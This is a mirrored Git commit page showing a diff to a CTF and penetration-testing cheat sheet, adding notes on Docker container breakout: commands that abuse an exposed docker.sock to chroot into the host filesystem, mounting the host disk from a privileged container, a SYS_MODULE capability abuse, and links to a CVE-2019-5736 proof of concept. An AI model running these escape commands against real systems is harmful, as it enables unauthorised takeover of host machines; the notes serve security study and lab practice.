Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-22 03:53:03 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2021-05-01 05:01:32 +05:00 committed by GitHub
parent f12190885c
commit e23ed6c5f7
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
Cheat Sheet.md
View file

@ -616,3 +616,17 @@ Break out of docker container<br/>
If docker.sock is on conatiner , upload static docker binary<br/>
`./docker -H unix:///var/run/docker.sock images`<br/>
`./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host`<br/>
## Docker Breakout/Exploits
* If we have a privilege docker and we can run command `fdisk -l` and view storage on the machine then we can mount the host file system <br/>
`mount /dev/sda<x> /mnt/host`
* We can look for container capabilites on docker with `capsh --print` and exploit it SYS_MODULE
https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
* There's another exploit realted to docker (CVE-2019-5736)
https://github.com/Frichetten/CVE-2019-5736-PoC